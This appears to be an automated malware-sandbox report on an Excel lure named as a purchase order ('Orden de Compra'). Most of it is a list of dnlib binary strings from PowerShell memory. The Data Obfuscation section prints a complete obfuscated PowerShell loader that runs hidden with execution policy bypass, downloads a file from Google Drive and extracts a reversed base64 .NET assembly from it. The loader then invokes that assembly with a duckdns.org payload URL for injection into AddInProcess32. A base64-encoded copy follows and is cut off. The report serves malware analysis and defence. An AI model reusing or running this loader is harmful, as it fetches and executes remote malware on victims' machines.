                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emd